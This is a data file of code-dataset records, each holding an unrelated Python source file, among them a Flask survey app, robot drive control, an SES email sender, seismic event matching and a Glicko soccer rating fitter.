+{"seq_id":"481385725","text":"from flask import Flask,render_template,redirect,request,session,flash\nfrom mysqlconnection import connectToMySQL # import the function that will return an instance of a connection\n\napp = Flask(__name__)\napp.secret_key = \"validation\"\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n if request.form:\n is_valid = True\n if len(request.form['name']) < 3:\n is_valid = False\n flash(\"Name must be at least 3 characters!\")\n try :\n dojo_id = int(request.form['dojo_id']) \n except Exception:\n is_valid = False\n flash(\"Must select Dojo!\")\n try :\n language_id = int(request.form['language_id']) \n except Exception:\n is_valid = False\n flash(\"Must select Language!\")\n if len(request.form['comment']) < 3:\n is_valid = False\n flash(\"Comment must be at least 3 characters!\")\n if not is_valid:\n return redirect('/')\n else:\n query = \"INSERT INTO students (name, comment, dojo_id, language_id) VALUES (%(name)s, %(comment)s, %(dojo_id)s, %(language_id)s);\"\n data = {\n \"name\":request.form['name'],\n \"comment\":request.form['comment'],\n \"dojo_id\":request.form['dojo_id'],\n \"language_id\":request.form['language_id']\n }\n student_id = connectToMySQL('dojo-survey').query_db(query, data)\n return redirect(f\"/display/{student_id}\")\n else:\n query_dojos = \"SELECT * FROM dojos;\"\n query_languages = \"SELECT * FROM languages;\"\n dojos = connectToMySQL('dojo-survey').query_db(query_dojos)\n languages = connectToMySQL('dojo-survey').query_db(query_languages)\n return render_template(\"index.html\", dojos=dojos, languages=languages)\n\n\n@app.route('/display/', methods=[\"GET\"])\ndef display(student_id):\n query = \"SELECT students.name, dojos.location, languages.language, students.comment FROM students JOIN languages on languages.id = students.language_id JOIN dojos on dojos.id = students.dojo_id WHERE students.id = %(student_id)s;\"\n data = {\n \"student_id\":student_id\n }\n students = connectToMySQL('dojo-survey').query_db(query, data)\n print(students)\n return render_template(\"display.html\", students=students)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"132331425","text":"from django.shortcuts import render\nfrom .models import Cas\n\n\ndef lista_casova(request):\n\n if request.method == 'GET':\n casovi = Cas.objects.all().order_by('dan', 'vreme_pocetka')\n context = {'casovi': casovi}\n return render(request, 'raspored/home.html', context)\n\n","sub_path":"apps/raspored/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"41938070","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 3 12:17:38 2018\n\n@author: github.com/GustavZ\n\"\"\"\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport yaml\nimport cv2\nfrom stuff.helper import Model, FPS, WebcamVideoStream, create_colormap, vis_text\nfrom skimage import measure\n\n\n## LOAD CONFIG PARAMS ##\nif (os.path.isfile('config.yml')):\n with open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\nelse:\n with open(\"config.sample.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\nVIDEO_INPUT = cfg['video_input']\nFPS_INTERVAL = cfg['fps_interval']\nALPHA = cfg['alpha']\nMODEL_NAME = cfg['dl_model_name']\nMODEL_PATH = cfg['dl_model_path']\nBBOX = cfg['bbox']\nMINAREA = cfg['minArea']\nVISUALIZE = cfg['visualize']\n\n\n# Hardcoded COCO_VOC Labels\nLABEL_NAMES = np.asarray([\n 'background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus',\n 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\n 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tv'])\n\n\ndef segmentation(model):\n detection_graph = model.detection_graph\n # fixed input sizes as model needs resize either way\n vs = WebcamVideoStream(VIDEO_INPUT,640,480).start()\n resize_ratio = 1.0 * 513 / max(vs.real_width,vs.real_height)\n target_size = (int(resize_ratio * vs.real_width), int(resize_ratio * vs.real_height))\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth=True\n fps = FPS(FPS_INTERVAL).start()\n print(\"> Starting Segmentaion\")\n with detection_graph.as_default():\n with tf.Session(graph=detection_graph,config=config) as sess:\n while vs.isActive():\n frame = vs.resized(target_size)\n batch_seg_map = sess.run('SemanticPredictions:0',\n feed_dict={'ImageTensor:0': [cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)]})\n # visualization\n if VISUALIZE:\n seg_map = batch_seg_map[0]\n seg_image = create_colormap(seg_map).astype(np.uint8)\n cv2.addWeighted(seg_image,ALPHA,frame,1-ALPHA,0,frame)\n vis_text(frame,\"fps: {}\".format(fps.fps_local()),(10,30))\n # boxes (ymin, xmin, ymax, xmax)\n if BBOX:\n map_labeled = measure.label(seg_map, connectivity=1)\n for region in measure.regionprops(map_labeled):\n if region.area > MINAREA:\n box = region.bbox\n p1 = (box[1], box[0])\n p2 = (box[3], box[2])\n cv2.rectangle(frame, p1, p2, (77,255,9), 2)\n vis_text(frame,LABEL_NAMES[seg_map[tuple(region.coords[0])]],(p1[0],p1[1]-10))\n cv2.imshow('segmentation',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n fps.update()\n fps.stop()\n vs.stop()\n\n\nif __name__ == '__main__':\n model = Model('dl', MODEL_NAME, MODEL_PATH).prepare_dl_model()\n segmentation(model)\n","sub_path":"run_deeplab.py","file_name":"run_deeplab.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"614826519","text":"from GJEMS.morph.morph import BasicMorph\nfrom GJEMS.morph.morphImport import SubTreeWriter\nimport sys\nimport numpy as np\nfrom scipy.cluster import hierarchy\nfrom scipy.spatial.distance import pdist\n\n\n\nassert len(sys.argv) == 3, 'Two arguments, the path of the swcfile and number to use expected, ' \\\n + str(len(sys.argv) - 1) + 'found'\nswcFile = sys.argv[1]\n\n\ndef getLeavesList(clusterNode):\n\n # For more info look at the doc of clusterNode.pres_order\n return clusterNode.pre_order(lambda x: x.id)\n\n\n\ntestNrn = BasicMorph(swcFile)\ntestNrn.initTerminalDegrees()\ntestNrn.initxyzr()\n\n\n\nobs = []\n\nsecNames = []\nfor morphSec in testNrn.allsec.itervalues():\n\n parentName = ''\n if not morphSec.ptr.sec.name() == 'Cell[0].soma[0]':\n parentName = morphSec.ptr.parent.name()\n if not ((parentName == 'Cell[0].soma[0]') and (morphSec.terminalDegree == 0)):\n obs.append([morphSec.terminalDegree])\n secNames.append(morphSec.ptr.sec.name())\n\n\nobs = np.asarray(obs)\nnObs = len(obs)\n\nif nObs > 1:\n\n linkMatrix = hierarchy.single(pdist(obs))\n rootNode = hierarchy.to_tree(linkMatrix)\n\n\n leavesList = hierarchy.leaves_list(linkMatrix)\n if rootNode.left.count > rootNode.right.count:\n levelIDs = leavesList[:rootNode.left.count]\n\n else:\n levelIDs = leavesList[-rootNode.right.count:]\n\n grossFeaturesSecs = []\n presSecPtr = None\n\n grossFeaturesSecs.append(testNrn.rootPtr.sec.name())\n for childSec in testNrn.rootPtr.child:\n if childSec.name().find('soma') < 0:\n presSecPtr = testNrn.getPtr(childSec)\n\n assert presSecPtr is not None\n\n while True:\n\n if presSecPtr.nchild() == 0:\n grossFeaturesSecs.append(presSecPtr.sec.name())\n break\n\n # if presSecPtr.nchild() > 1:\n # print([secNames.index(x.name()) in levelIDs for x in presSecPtr.child])\n # import ipdb\n # ipdb.set_trace()\n\n nChildInLevel = 0\n for childSec in presSecPtr.child:\n if secNames.index(childSec.name()) in levelIDs:\n nChildInLevel += 1\n childSecInLevel = childSec\n\n if nChildInLevel == 1:\n grossFeaturesSecs.append(presSecPtr.sec.name())\n presSecPtr = testNrn.getPtr(childSecInLevel)\n\n else:\n grossFeaturesSecs.append(presSecPtr.sec.name())\n break\n\nelif nObs == 1:\n grossFeaturesSecs = secNames\n\n\n\n\n\ndef extraColFunc(secPtr):\n\n if secPtr.sec.name() in grossFeaturesSecs:\n return [int(sys.argv[2])]\n else:\n return [0]\n\n\n\nsswcFName = swcFile[:-4] + '_GrossFeatureColoured.sswc'\n\nswcWriter = SubTreeWriter(testNrn.rootPtr, extraColFunc)\nswcWriter.write(sswcFName)\n\n\n","sub_path":"test_tmp/shapeBasedAlignment/saveGrossFeatureColouredSSWCNrn.py","file_name":"saveGrossFeatureColouredSSWCNrn.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"81237306","text":"import math\nimport logging\n\nfrom ..controllers.pid_controller import PIDController\nfrom .pathfinder_python.DistanceFollower import DistanceFollower\nfrom ..spine.ourlogging import setup_logging\nfrom ..units import *\nfrom ..timer import Timer\n\nsetup_logging(__file__)\nlogger = logging.getLogger(__name__)\n\n\nclass TankDrive:\n\n def __init__(self, tank, gyro=None):\n self.tank = tank\n self.gyro = gyro\n self.timer = Timer()\n\n def drive_straight_voltage(self, value):\n if value == Unit(0, 1):\n self.tank.stop()\n else:\n self.tank.drive(value)\n\n def drive_arc_voltage(self, value, arc):\n self.tank.drive(value + arc, value - arc)\n\n def drive_voltage(self, left, right):\n self.tank.drive(left, right)\n\n def drive_straight_velocity(self, velocity):\n if(velocity == Constant(0)):\n self.tank.stop()\n else:\n self.tank.drive_pid(velocity)\n\n def drive_arc_velocity(self, velocity, radius, cw):\n\n angular_velocity = velocity / radius\n\n if cw:\n right = angular_velocity * (radius - (self.tank.wheelbase_width / 2))\n left = angular_velocity * (radius - (self.tank.wheelbase / 2))\n else:\n left = angular_velocity * (radius - (self.tank.wheelbase_width / 2))\n right = angular_velocity * (radius - (self.tank.wheelbase_width / 2))\n\n self.drive_velocity(left, right)\n\n def drive_velocity(self, left, right):\n self.tank.drive_pid(left, right)\n\n def drive_straight_velocity_for_time(self, velocity, delay, stop=True):\n self.drive_straight_velocity(velocity)\n self.timer.sleep(delay)\n if stop:\n self.tank.stop()\n\n def drive_arc_velocity_for_time(self, velocity, radius, cw, delay, stop=True):\n self.drive_arc_velocity(velocity, radius, cw)\n self.timer.sleep(delay)\n if stop:\n self.tank.stop()\n\n def drive_straight_distance(self, distance, p, i, d):\n if distance == Constant(0):\n self.tank.stop()\n else:\n self.tank.set_pid_type(\"distance\")\n distance_controller = PIDController(kp=p, ki=i, kd=d,\n input_sources=self.tank,\n output_sources=self.tank)\n distance_controller.set_setpoint(distance)\n while not distance_controller.is_finnished():\n distance_controller.calculate()\n\n def rotate_at_angular_velocity(self, angular_velocity):\n self.tank.rotate_pid(angular_velocity, -angular_velocity)\n\n def rotate_at_angular_velocity_for_time(self, angular_velocity, delay, stop=True):\n self.rotate_at_angular_velocity(angular_velocity)\n self.timer.sleep(delay)\n if stop:\n self.tank.stop()\n\n def rotate_to_angle(self, angle, p, i, d):\n if self.gyro is not None:\n self.tank.set_pid_type(\"angle\")\n angle_controller = PIDController(kp=p, ki=i, kd=d,\n input_sources=self.gyro,\n output_sources=self.tank)\n angle_controller.set_setpoint(angle)\n while not angle_controller.is_finished():\n angle_controller.calculate()\n elif self.tank.is_velocity_controlled():\n self.tank.set_pid_type(\"angle\")\n angle_controller = PIDController(kp=p, ki=i, kd=d,\n input_sources=self.tank,\n output_sources=self.tank)\n angle_controller.set_setpoint(angle)\n while not angle_controller.is_finished():\n angle_controller.calculate()\n else:\n raise Exception(\"Can't run rotate_to_angle without sensors\")\n logger.error(\"Can't run rotate_to_angle without sensors\")\n\n def followTrajectory(self, left_config, left_trajectory, right_config, right_trajectory):\n left_follower = DistanceFollower(left_trajectory)\n left_follower.configurePIDVA(kp=left_config['kp'],\n ki=left_config['ki'],\n kd=left_config['kd'],\n kv=left_config['kv'],\n ka=left_config['ka'])\n\n right_follower = 
DistanceFollower(right_trajectory)\n right_follower.configurePIDVA(kp=right_config['kp'],\n ki=right_config['ki'],\n kd=right_config['kd'],\n kv=right_config['kv'],\n ka=right_config['ka'])\n\n while not left_follower.is_finished() or not right_follower.is_finished():\n left_input = self.tank.get_left_posiiton()\n right_input = self.tank.get_right_position()\n\n left_output = left_follower.calculate(left_input)\n right_output = right_follower.calculate(right_input)\n\n actual_angle = self.gyro.get_heading()\n desired_angle = math.degrees(left_follower.get_heading())\n angle_difference = desired_angle - actual_angle\n # TODO: figure out reason behind constant\n turn = 0.8 * (-1.0 / 80.0) * angle_difference\n\n self.tank.drive(left_output + turn, right_output - turn)\n self.tank.stop()\n","sub_path":"head/navigation/tank.py","file_name":"tank.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
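`configurePIDVA` belongs to the vendored Pathfinder-style follower; its control law (as commonly implemented, an assumption here since `DistanceFollower` itself is not shown) combines a positional P and D term with velocity and acceleration feedforward:

```python
# Illustrative PIDVA step, not the vendored DistanceFollower implementation.
def pidva_step(kp, kd, kv, ka, seg_pos, seg_vel, seg_acc,
               measured_pos, last_error, dt):
    error = seg_pos - measured_pos
    d_error = (error - last_error) / dt
    output = kp * error + kd * d_error + kv * seg_vel + ka * seg_acc
    return output, error  # carry the error forward for the next derivative
```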
+{"seq_id":"600644534","text":"from datetime import datetime\nfrom email.mime.application import MIMEApplication\nimport base64\n\nfrom django.conf import settings\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport boto3\n\nfrom .pdf_generation import generate_pdf\n\n\ndef send_email(acces_hash,to_addr, receiver_name, report_link):\n email_conn = None\n message = MIMEMultipart()\n message[\"From\"] = settings.FROM_ADDR\n message[\"To\"] = to_addr\n message[\"Subject\"] = settings.EMAIL_SUBJECT\n encoded = base64.b64encode(open(settings.METFLUX_JPEG_PATH, \"rb\").read()).decode()\n body = settings.EMAIL_BODY.format(\n receiver_name, report_link, encoded)\n\n message.attach(MIMEText(body, \"html\"))\n pdf = MIMEApplication(base64.b64decode(generate_pdf(acces_hash)),\n _subtype=\"pdf\")\n pdf.add_header('Content-Disposition', 'attachment',\n filename=\"MyFitPrint_{}.pdf\".\\\n format(datetime.today().strftime(\"%d-%m-%Y\")))\n message.attach(pdf)\n\n if not email_conn:\n email_conn = establish_email_connection()\n\n response = email_conn.send_raw_email(\n Source=message['From'],\n Destinations=[to_addr],\n RawMessage={\n 'Data': message.as_string()\n }\n )\n\n\ndef establish_email_connection():\n\n client = boto3.client(\n 'ses',\n region_name=settings.EMAIL_REGION_NAME,\n aws_access_key_id=settings.EMAIL_SECRET_KEY_ID,\n aws_secret_access_key=settings.EMAIL_SECRET_KEY\n )\n\n return client\n\n\n\n\n\n","sub_path":"myfitapp/core/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"500969809","text":"import pandas as pd\nimport numpy as np\nimport scipy.stats\nimport math\nfrom sklearn.cross_validation import StratifiedKFold, KFold\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nimport random\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import StratifiedKFold\nfrom itertools import cycle\nfrom scipy import interp\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.metrics import *\nfrom sklearn.neighbors import KNeighborsClassifier\nmc = {}\nfor d in range(1,11):\n mc['mc'+str(d)] = 0\n\nrf = RandomForestClassifier(n_estimators=100, criterion=\"entropy\",random_state=42949694,class_weight=\"balanced\")\nfor i in range(0,10):\n for j in range(0,5):\n train = pd.read_csv('wiki'+str(i)+'train'+str(j)+'.csv',delimiter='\\t')\n test = pd.read_csv('wiki'+str(i)+'test'+str(j)+'.csv',delimiter='\\t')\n tt = test.copy()\n Y_tr = train['class'].values\n del train['prev']\n del train['curr']\n del train['time']\n del train['status']\n del train['class']\n del train['prefAttachCategories']\n del train['jaccardCategories']\n del train['commonCategories']\n X_tr = train.values;\n Y_te_li = test['class'].values\n del test['class']\n del test['prev']\n del test['curr']\n del test['time']\n del test['status']\n del test['class_per']\n del test['status_class']\n del test['prefAttachCategories']\n del test['jaccardCategories']\n del test['commonCategories']\n X_te = test.values;\n probas_ = rf.fit(X_tr,Y_tr).predict_proba(X_te)\n predicted_digits = rf.predict(X_te)\n Y_p = predicted_digits\n Y_pp = probas_\n tt['pred'] = Y_pp[:,1]\n tt = tt.sort(['pred'], ascending=False)\n for d in range(1,11):\n newn = int(round(len(tt)*d*0.1))\n cf = tt.head(newn)\n mc['mc'+str(d)] = mc['mc'+str(d)] + (len(cf[cf['class']==1])/newn)\n \n\n \n\nf = open('graphprecisionRandom.txt','w')\nfor d in mc:\n f.write(str(d)+': '+str(mc[d]/50)+'\\n')\n\n\nf.close()\n \n\n\n\n\n\n\n","sub_path":"wikinewTrad.py","file_name":"wikinewTrad.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"247998088","text":"'''***************************\n|Поиск совпадений по временам|\n***************************'''\n\nfrom obspy.core import UTCDateTime\n\ndef main():\n\n stationsName={\"BKI\":0,\"KBG\":0,\"KBT\":0,\"KDT\":0,\"MKZ\":0} # Названия станций\n dictOfActs={} # Словарь в который будем записывать события и считать совпадения\n\n '''*****************************************************\n |Читаем поочередной файлы и записываем время в словарь,|\n |если оно присутствует, то к значению ключа прибавляем |\n |единичку. |\n *****************************************************'''\n\n for name in stationsName:\n f=open(f\"tectsActions({name}).txt\", \"r\")\n for line in f:\n if (dictOfActs.get(line[0:27])==None):\n dictOfActs[line[0:27]]=1\n else:\n dictOfActs[line[0:27]]+=1\n\n '''******************************************\n Учитывая кол-во совпадений выписываем все в |\n отдельный файлик. |\n ******************************************'''\n f=open(\"tectActsCoins.txt\",'w+')\n for line in dictOfActs:\n if (dictOfActs[line]>3): # Кол-во совпадений\n f.write(f\"{line} | {dictOfActs[line]}\\n\")\n f.close()\n\nmain()","sub_path":"coincidencer.py","file_name":"coincidencer.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"548832274","text":"from itertools import product\nfrom typing import List, Tuple, Dict\n\nimport pandas as pd\nfrom sklearn.metrics import log_loss\nfrom tqdm import tqdm\n\nfrom glicko2 import Glicko2, Rating\n\n\nclass GlickoSoccer(object):\n\n def __init__(self, is_draw_mode=True, is_prev_season_init=False, between_train_test_round=19):\n self.is_draw_mode = is_draw_mode\n self.is_prev_season_init = is_prev_season_init\n self.between_train_test_round = between_train_test_round\n\n def rate_teams(self, matches: pd.DataFrame, ratings: Rating(), draw_inclination: float, home_advantage: float) -> Rating():\n \"\"\"\n Calculate the ratings of teams using the history of matches\n \"\"\"\n\n glicko = Glicko2(is_draw_mode=self.is_draw_mode, draw_inclination=draw_inclination)\n\n for row in matches.itertuples():\n outcome, home_team, away_team = row.outcome, row.home_team, row.away_team\n\n ratings[home_team], ratings[away_team] = glicko.rate(ratings[home_team], ratings[away_team], home_advantage, outcome)\n\n return ratings\n\n def ratings_initialization(self, results: pd.DataFrame, schedule: pd.DataFrame, current_season: int, tournament: str,\n init_rd: float, draw_inclination: float, home_advantage: float, new_teams_rating: float) -> Rating():\n \"\"\"\n Two ways of rating initialization:\n 1) all teams get the same rating\n 2) teams get ratings from previous season with new rating deviation,\n teams from second league get specific ratings\n \"\"\"\n teams = schedule.loc[(schedule['tournament'] == tournament), 'home_team'].unique()\n\n if self.is_prev_season_init:\n previous_matches = results.loc[(results['tournament'] == tournament) & (results['season'] == (current_season - 1))]\n previous_teams = previous_matches['home_team'].unique()\n\n init_ratings = {team: Rating(rd=init_rd) for team in previous_teams}\n\n # get ratings from previous season\n previous_ratings = self.rate_teams(previous_matches, init_ratings, draw_inclination, home_advantage)\n\n # update a rating deviation\n ratings = {team: Rating(mu=previous_ratings[team].mu, rd=init_rd) for team in previous_ratings}\n\n # teams from second league\n new_teams = [team for team in teams if team not in previous_teams]\n\n # initialize the ratings of new teams\n ratings.update({team: Rating(mu=new_teams_rating, rd=init_rd) for team in new_teams})\n\n else:\n ratings = {team: Rating(rd=init_rd) for team in teams}\n\n return ratings\n\n @staticmethod\n def _log_loss(outcome: str, win_probability: float, tie_probability: float, loss_probability: float) -> float:\n \"\"\"\n Calculate log loss value of one match.\n \"\"\"\n predict = [win_probability, tie_probability, loss_probability]\n\n if outcome == 'H':\n target = [1, 0, 0]\n\n elif outcome == 'D':\n target = [0, 1, 0]\n\n else:\n target = [0, 0, 1]\n\n return log_loss(target, predict)\n\n def calculate_loss(self, results: pd.DataFrame, tournament: str, season: int, init_rd: float, draw_inclination: float,\n home_advantage: float, new_teams_rating: float) -> float:\n \"\"\"\n Calculate the value of the loss function\n \"\"\"\n\n # initialize Glicko2 with specific draw inclination\n glicko = Glicko2(is_draw_mode=self.is_draw_mode, draw_inclination=draw_inclination)\n\n # separate matches into two parts: calculate ratings from first part,\n # for second part predict matches, calculate loss value\n matches = results.loc[(results['tournament'] == tournament) & (results['season'] == season)]\n train_matches = matches.loc[matches['round'] < self.between_train_test_round]\n 
test_matches = matches.loc[matches['round'] > self.between_train_test_round]\n\n ratings = self.ratings_initialization(results, matches, season, tournament, init_rd, draw_inclination,\n home_advantage, new_teams_rating)\n\n ratings = self.rate_teams(train_matches, ratings, draw_inclination, home_advantage)\n\n log_loss_value = 0\n number_matches = test_matches.shape[0]\n for row in test_matches.itertuples():\n outcome, home_team, away_team = row.outcome, row.home_team, row.away_team\n\n # get current team ratings\n home_rating, away_rating = ratings[home_team], ratings[away_team]\n\n # update team ratings\n ratings[home_team], ratings[away_team] = glicko.rate(home_rating, away_rating, home_advantage, outcome)\n\n # calculate outcome probabilities\n win_probability, tie_probability, loss_probability = glicko.probabilities(home_rating, away_rating, home_advantage)\n\n log_loss_value += self._log_loss(outcome, win_probability, tie_probability, loss_probability)\n\n log_loss_value /= number_matches\n\n return log_loss_value\n\n def fit_parameters(self, results: pd.DataFrame, tournament: str, seasons: List[int],\n init_rds: List[float], draw_inclinations: List[float],\n home_advantages: List[float], new_teams_ratings: List[float]) -> Tuple[Tuple[float], float, Dict]:\n\n matches = results.loc[(results['tournament'] == tournament) & results['season'].isin(seasons)]\n\n # get all combinations of parameters\n parameters_list = list(product(init_rds, draw_inclinations, home_advantages, new_teams_ratings))\n\n parameters_loss = {parameters: 0 for parameters in parameters_list}\n for parameters in tqdm(parameters_list):\n\n init_rd, draw_inclination, home_advantage, new_teams_rating = parameters\n\n parameters_loss[parameters] = 0\n for season in seasons:\n loss = self.calculate_loss(matches, tournament, season, init_rd, draw_inclination, home_advantage, new_teams_rating)\n\n parameters_loss[parameters] += loss\n\n parameters_loss[parameters] /= len(seasons)\n\n optimal_parameters = min(parameters_loss, key=parameters_loss.get)\n optimal_loss = parameters_loss[optimal_parameters]\n\n return optimal_parameters, optimal_loss, parameters_loss\n","sub_path":"glicko_soccer/glicko_soccer.py","file_name":"glicko_soccer.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
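One subtlety in `_log_loss` above: sklearn's `log_loss`, given a one-hot list target such as `[1, 0, 0]` and a 1-D probability vector, scores three binary samples and averages them rather than computing a single categorical cross-entropy. A quick check with illustrative numbers:

```python
import numpy as np
from sklearn.metrics import log_loss

probs = [0.5, 0.3, 0.2]   # home win / draw / away win
target = [1, 0, 0]        # home win, as _log_loss builds it
manual = -(np.log(0.5) + np.log(1 - 0.3) + np.log(1 - 0.2)) / 3
assert np.isclose(log_loss(target, probs), manual)  # ~0.424
```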
+{"seq_id":"636528518","text":"\nimport sys\n\nimport pandas as pd\nimport torch\n\nfrom pnu_semiconductor.my_utils import wf2graph\nsys.path.append(r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor\\grape'.replace('\\\\', '/'))\nsys.path.append(r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor'.replace('\\\\', '/'))\nsys.path.append(r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor\\grape\\pnu_semiconductor'.replace('\\\\', '/'))\nfrom my_preprocess import *\nfrom utils.utils import get_activation, get_known_mask, mask_edge\n\n\n#모듈 불러오기\nmodel = torch.load(\n r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor\\grape\\pnu_semiconductor\\semi\\test\\semi\\9\\model.pt'.replace(\n '\\\\', '/'))\nimpute_model = torch.load(\n r'C:\\Users\\user\\Documents\\minkun\\jupyter\\semiconductor\\grape\\pnu_semiconductor\\semi\\test\\semi\\9\\impute_model.pt'.replace(\n '\\\\', '/'))\n\n# 패키지 구조까지 같이 저장하고 있다.. 폴더구조가 중요함..\nprint(model)\nprint(impute_model)\n\n\n# 미니 데이터 생성\ndata = {'LOT_ID': [1] * 16,\n 'WF_ID': [1] * 16,\n 'TIME': [2] * 16,\n 'X': [0] * 4 + [1] * 4 + [2] * 4 + [3] * 4,\n 'Y': [0, 1, 2, 3] * 4,\n 'para1': [1, 2, 3, 4,\n 5, pd.NA, 2, 3,\n 4, 5, pd.NA, 7,\n 8, 9, 10, 11],\n 'para2': [1, 2, 3, 4,\n 5, 2, pd.NA, 3,\n 4, 5, 7, pd.NA,\n 8, 9, 10, 11],\n 'index': range(16)\n }\ndft = pd.DataFrame(data)\ndft = dft.set_index(['LOT_ID', 'WF_ID'])\nwf = dft\nprint(wf)\n\nx, edge_index, edge_attr, edge_sim_idx = wf2graph(wf, (3, 3))\n\nprint('x')\nprint(x.shape)\nprint(x)\nprint('edge_index')\n\nprint(edge_index.t().shape)\nprint('edge_attr')\nprint(edge_attr.shape)\n\nprint('torch.cat([edge_index.t(), edge_attr])')\nt = torch.cat([edge_index.t(), edge_attr], dim=-1)\nprint(t)\nprint(edge_sim_idx.shape)\nprint(edge_sim_idx.t())\ngraph_li = [(x, edge_index, edge_attr, edge_sim_idx)]\nedge_masking_prob = 0.8\nres = []\nmodel.eval()\nimpute_model.eval()\n\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n print(\"GPU available.\")\nelse:\n device = torch.device(\"cpu\")\n print(\"GPU not available. Using CPU.\")\n\n# cols = []\nnrmse = []\ngraph_idx = 0\ngraph_li = [graph_li[graph_idx]]\nassert len(graph_li) == 1\n\nwith torch.no_grad():\n for i in graph_li: # forward\n x, edge_index, edge_attr, edge_index_similarity = i\n x = x.clone().detach().to(device)\n edge_index = edge_index.clone().detach().to(device)\n edge_attr = edge_attr.clone().detach().to(device).to(torch.float64)\n edge_index_similarity = edge_index_similarity.clone().detach().to(device)\n\n # known은 학습할때만 한다. forward에서는 안한다.\n # 여기서 known은 성능측정을 위해 가리는 엣지임.\n train_edge_mask = get_known_mask(edge_masking_prob, int(\n edge_attr.shape[0] / 2)) # train_edge_prob=0.7 # 양방향 엣지니까 하나만 속하도록. tensor(8240,)\n print()\n double_train_edge_mask = torch.cat((train_edge_mask, train_edge_mask),\n dim=0) # 양방향 엣지에 적용가능하도록 cat함. 
tensor(16480,)\n known_edge_index, known_edge_attr = mask_edge(edge_index, edge_attr,\n double_train_edge_mask,\n True)\n test_edge_index, test_edge_attr = mask_edge(edge_index, edge_attr,\n ~double_train_edge_mask,\n True)\n\n known_edge_index_single = known_edge_index[:, :known_edge_attr.shape[0] // 2].detach()\n known_edge_attr_single = known_edge_attr[:known_edge_attr.shape[0] // 2, 0].detach()\n\n edge_index_single = edge_index[:, :edge_index.shape[1] // 2]\n edge_attr_single = edge_attr[:edge_index.shape[1] // 2, 0]\n\n test_edge_index_single = test_edge_index[:, :test_edge_attr.shape[0] // 2].detach()\n test_edge_attr_single = test_edge_attr[:test_edge_attr.shape[0] // 2, 0].detach()\n # x_embd = model(x=x, edge_index=known_edge_index, edge_attr=known_edge_attr,\n # edge_sim_index=edge_index_similarity)\n # pred = impute_model([x_embd[test_edge_index[0]], x_embd[test_edge_index[1]]])\n # pred_labels = pred[:int(test_edge_attr.shape[0] / 2), 0]\n\n label = test_edge_attr[:test_edge_attr.shape[0] // 2, 0]\n\n known_edge_index_single = known_edge_index[:, :known_edge_attr.shape[0] // 2].detach()\n single_known_edge_attr = known_edge_attr[:known_edge_attr.shape[0] // 2, 0].detach()\n col_range = range(16, 18) # node index range of the parameter columns\n edge_sum = (test_edge_attr.shape[0]//2)\n for i in col_range: # compute the NRMSE.\n idx = edge_index_single[1, :] == i # we kept the first half of the edges, so this must be row 1, not row 0.\n col = edge_index_single[:, idx]\n val = edge_attr_single[idx]\n\n test_idx = test_edge_index_single[1, :] == i\n test_col = test_edge_index_single[:, test_idx]\n test_by_col = test_edge_attr_single[test_idx]\n # pred_by_col = pred_labels[test_idx] # no model output here, so real imputation is unavailable.\n # impute with the mean instead and inspect the NRMSE.\n pred_by_col = test_by_col.mean().expand(len(test_by_col))\n\n # cols.append((i, col, val))\n std = torch.std(val).item() # must use the std of this column.\n # std = torch.std(edge_attr) # wrong\n up = torch.sqrt(((test_by_col - pred_by_col) ** 2).sum()) #\n\n # idx = known_edge_index_single[1, :] == i # we kept the first half of the edges, so this must be row 1, not row 0.\n # col = known_edge_index_single[:, idx]\n # val = single_known_edge_attr[idx] # select only the edge_attr connected to column i.\n # print(i, val)\n # edge_sum+=len(val)\n #\n # # cols.append((i, col, val))\n # std = torch.std(val).item()\n # # std = torch.std(edge_attr)\n # up = torch.sqrt(((label - pred_labels) ** 2).sum())\n nrmse.append((i, (up / std).item()))\n # accumulated into all_pred while looping.\nassert edge_sum==28 #\nprint(f'edge count : {len(double_train_edge_mask)}')\nprint(f'masked count : 